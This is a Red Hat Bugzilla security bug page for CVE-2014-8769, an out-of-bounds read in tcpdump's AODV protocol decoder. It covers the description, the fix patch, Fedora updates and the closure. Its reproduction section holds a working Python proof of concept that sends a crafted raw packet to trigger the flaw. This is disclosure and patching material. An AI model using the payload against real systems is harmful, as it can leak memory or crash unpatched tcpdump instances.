Bug 1165162 (CVE-2014-8769) - CVE-2014-8769 tcpdump: unreliable output using malformed AOVD payload
Summary: CVE-2014-8769 tcpdump: unreliable output using malformed AOVD payload
Keywords:
Status: CLOSED WONTFIX
Alias: CVE-2014-8769
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
low
low
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard:
Depends On: 1165167
Blocks: 1165164
TreeView+ depends on / blocked
 
Reported: 2014-11-18 13:26 UTC by Vasyl Kaigorodov
Modified: 2021-06-14 15:04 UTC (History)
5 users (show)

Fixed In Version: tcpdump 4.7.0
Clone Of:
Environment:
Last Closed: 2021-06-14 15:04:04 UTC
Embargoed:

Attachments (Terms of Use)
Fix_uncheck_length_patch_from_debian_bug (469 bytes, patch)
2014-11-25 16:56 UTC, Siddharth Sharma 		no flags Details | Diff
View All

Description Vasyl Kaigorodov 2014-11-18 13:26:02 UTC 
Following issue was reported in [1]:
...
The application decoder for the Ad hoc On-Demand Distance Vector (AODV) protocol fails to perform input validation and performs unsafe out-of-bound accesses. The application will usually not crash, but perform out-of-bounds accesses and output/leak larger amounts of invalid data, which might lead to dropped packets. It is unknown if other payload exists that might trigger segfaults.

To reproduce start tcpdump on a network interface

   sudo tcpdump -i lo -s 0 -n -v

(running the program with sudo might hide a possible segfault message on certain environments, see dmesg for details)
and use the following python program to generate a frame on the network (might also need sudo):

#!/usr/bin/env python
    from socket import socket, AF_PACKET, SOCK_RAW
    s = socket(AF_PACKET, SOCK_RAW)
    s.bind(("lo", 0))
    aovd_frame = "\x00\x00\x00\x00\x00\x00\x00\x00\x8c\x7a\xdf\x6f\x08\x00\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01\x68\x0a\x02\x02\x02\x02\x8e\x0d\x00\x4b\x00\x00\xe8\x12\x00\x00\x00\x00\x1f\xc6\x51\x35\x97\x00\x24\x8c\x7a\xdf\x6f\x08\x00\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01"
    s.send(aovd_frame)

Affected versions are 3.8 through 4.6.2
...

[1]: http://seclists.org/bugtraq/2014/Nov/88
Comment 1 Vasyl Kaigorodov 2014-11-18 13:31:39 UTC 
Created tcpdump tracking bugs for this issue:

Affects: fedora-all [bug 1165167]
Comment 3 Siddharth Sharma 2014-11-25 16:56:32 UTC 
Created attachment 961288 [details]
Fix_uncheck_length_patch_from_debian_bug
Comment 5 Siddharth Sharma 2014-11-28 09:10:04 UTC 
Analysis
========

In function udp_print(register const u_char *bp, u_int length, register const u_char *bp2, int fragmented) the value of argument length is not checked properly, which results in the crash of the tcpdump when trying to print data from the malformed AOVD payload.
Comment 6 Fedora Update System 2014-12-04 06:25:54 UTC 
tcpdump-4.4.0-4.fc19 has been pushed to the Fedora 19 stable repository.  If problems still persist, please make note of it in this bug report.
Comment 7 Fedora Update System 2014-12-06 10:25:44 UTC 
tcpdump-4.6.2-2.fc21 has been pushed to the Fedora 21 stable repository.  If problems still persist, please make note of it in this bug report.
Comment 8 Siddharth Sharma 2015-04-30 07:53:43 UTC 
Statement:

Red Hat Product Security has rated this issue as having low security impact, a future update may address this flaw in tcpdump.
Comment 9 Product Security DevOps Team 2021-06-14 15:04:04 UTC 
This bug is now closed. Further updates for individual products will be reflected on the CVE page(s):

https://access.redhat.com/security/cve/cve-2014-8769
Note You need to log in before you can comment on or make changes to this bug.